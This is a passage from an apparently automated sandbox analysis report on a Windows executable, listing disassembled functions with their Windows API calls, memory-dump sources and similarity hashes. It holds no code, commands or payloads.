                                                                                                                                                                  Function 00433D9E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumProcesses.PSAPI(?,00000800,?,?,00443D49,?,?,?,004A8178), ref: 00433DBB
                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,004A8178), ref: 00433E19
                                                                                                                                                                  • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00433E2C
                                                                                                                                                                  • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104), ref: 00433E43
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00433EC8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses
                                                                                                                                                                  • String ID: I=D
                                                                                                                                                                  • API String ID: 2155911829-2605949546
                                                                                                                                                                  • Opcode ID: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                                                                                                                                                  • Instruction ID: 36098e5712afd53b5e3c4de91d69c0015cf2cbbc5c01d2287a97767e02e0faf1
                                                                                                                                                                  • Opcode Fuzzy Hash: e2a61d30099513a4b86aa9445ff639564bac9cad2a304c62a227ff9d1443cd16
                                                                                                                                                                  • Instruction Fuzzy Hash: 05319376600108AFDB11CFA4CD85EEF73B9AF8C701F10419AFA0987250DB75AB85CBA4
                                                                                                                                                                  Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                                  • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3429747543-0
                                                                                                                                                                  • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                  • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                                                  • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                  • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                                                  Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend
                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                  • API String ID: 3850602802-3636473452
                                                                                                                                                                  • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                  • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                                                  • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                  • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                                                                                  Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3985565216-0
                                                                                                                                                                  • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                                  • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                                                                                  • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                                                                                  • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                                                                                  Function 00434034 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                                  Strings
                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                                                                                  • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                  • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                  • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                                                  Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                                                                                    • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1957940570-0
                                                                                                                                                                  • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                  • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                                                                                                                                  • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                                                                                                                                  Function 00465489 Relevance: 9.3, APIs: 6, Instructions: 281networkmemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                                                                                                                    • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                                                  • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                                                                                                                  • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                                                                                                                  • WSACleanup.WSOCK32 ref: 00465762
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Global$AllocByteCharCleanupFreeMultiStartupWidegethostbynameinet_addr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 867222529-0
                                                                                                                                                                  • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                  • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                                                                                                                  • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                                                                                                                  • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                                                                                                                  Function 0043028B Relevance: 9.3, APIs: 6, Instructions: 255COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004302E6
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00430364
                                                                                                                                                                  • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004303C3
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 004303EC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3220332590-0
                                                                                                                                                                  • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                  • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                                                                                                                                  • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                                                                                                                                  • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                                                                                                                                  Function 00425095 Relevance: 9.2, APIs: 6, Instructions: 244COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,00000000), ref: 00425153
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,?,00000000,00000000,00000000), ref: 004251D9
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00000000,00000000,00000000), ref: 0042524C
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00425333,00000000,00000000,00000000), ref: 00425265
                                                                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00425333,00000000,00000000,00000000), ref: 004252C1
                                                                                                                                                                  • CompareStringW.KERNEL32(?,?,00000000,?,00000000,00000000), ref: 004252D5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$AllocateCompareHeapInfoString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1019172818-0
                                                                                                                                                                  • Opcode ID: a97e87a0cf8e327970f42a8fe21626367e887f7120d8d0fd46045620408d1da2
                                                                                                                                                                  • Instruction ID: 14196df02b160664b9a6e4d163639003d0329da294e125f629acad21a16e56a1
                                                                                                                                                                  • Opcode Fuzzy Hash: a97e87a0cf8e327970f42a8fe21626367e887f7120d8d0fd46045620408d1da2
                                                                                                                                                                  • Instruction Fuzzy Hash: 2281D231F00A26AFDF218E64EC51BBF7BA29F45320F94015BE810E62D1D7798C61CB69
                                                                                                                                                                  Function 0047A66E Relevance: 9.2, APIs: 6, Instructions: 196windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                  • GetMenu.USER32 ref: 0047A703
                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                                                  • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                                                  • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                                                  • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$Item$CountMessagePostStringWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3481743490-0
                                                                                                                                                                  • Opcode ID: 75ea3710cde785a3badf6c116863c36f9491e4eb60511417b382fa9c507b668b
                                                                                                                                                                  • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                                  • Opcode Fuzzy Hash: 75ea3710cde785a3badf6c116863c36f9491e4eb60511417b382fa9c507b668b
                                                                                                                                                                  • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                                                  Function 0041C62B Relevance: 9.2, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,7FFFFFFF,00000100,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,7FFFFFFF,00000001,00000000,7FFFFFFF), ref: 0041C69C
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0041C70A
                                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,00000000,00000000), ref: 0041C726
                                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,00000000,?,?), ref: 0041C75F
                                                                                                                                                                  • LCMapStringW.KERNEL32(?,?,?,?,00000000,?), ref: 0041C7C5
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041C7E4
                                                                                                                                                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiStringWide$AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1400492145-0
                                                                                                                                                                  • Opcode ID: 121c2e71a63d83f202090fb515f4f119a3fa74be0ae2761aea1c77af5e92b77f
                                                                                                                                                                  • Instruction ID: c47f3d818bad9736da72325d1ab4489a7f384eb940dec42a4d47e01db447a74c
                                                                                                                                                                  • Opcode Fuzzy Hash: 121c2e71a63d83f202090fb515f4f119a3fa74be0ae2761aea1c77af5e92b77f
